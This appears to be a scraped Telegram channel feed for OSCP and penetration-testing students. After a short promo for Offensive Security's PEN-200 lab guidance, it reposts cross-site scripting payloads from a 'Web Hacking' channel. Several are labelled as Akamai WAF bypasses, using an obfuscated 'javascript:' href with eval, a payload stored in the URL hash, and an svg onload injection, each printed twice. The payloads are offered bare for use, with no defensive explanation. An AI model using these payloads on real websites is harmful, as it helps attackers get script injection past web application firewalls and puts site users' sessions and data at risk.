We selected 11 machines in the #PEN200 #pwk labs and provided guidance on how to compromise them: offs.ec/3OJFXDi
#oscp #offensivesecurity
#oscp #offensivesecurity
Offensive Security Support Portal
PEN-200 Labs Learning Path
As pentesters, we are usually asked to operate in an unfamiliar environment, find as many software, logical, or misconfiguration vulnerabilities as possible, and do all of that under stress due to ...
π₯OSCP Trainingπ₯π‘βοΈπ¨π»βπ» pinned Β«https://t.me/bug_bounty_bootcampΒ»
Forwarded from Web Hacking
Akamai WAF bypass
<A href="javascrip%09t:eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
<A href="javascrip%09t:eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
Forwarded from Web Hacking
A nice way to store the payload
"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>
"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>
Forwarded from Web Hacking
A payload to bypass Akamai WAF
<A href="javascrip%09t:eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
<A href="javascrip%09t:eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
Forwarded from Web Hacking
Another one
"><img/src/style=html:url("data:,"><svg/onload=confirm(69)>")>
"><img/src/style=html:url("data:,"><svg/onload=confirm(69)>")>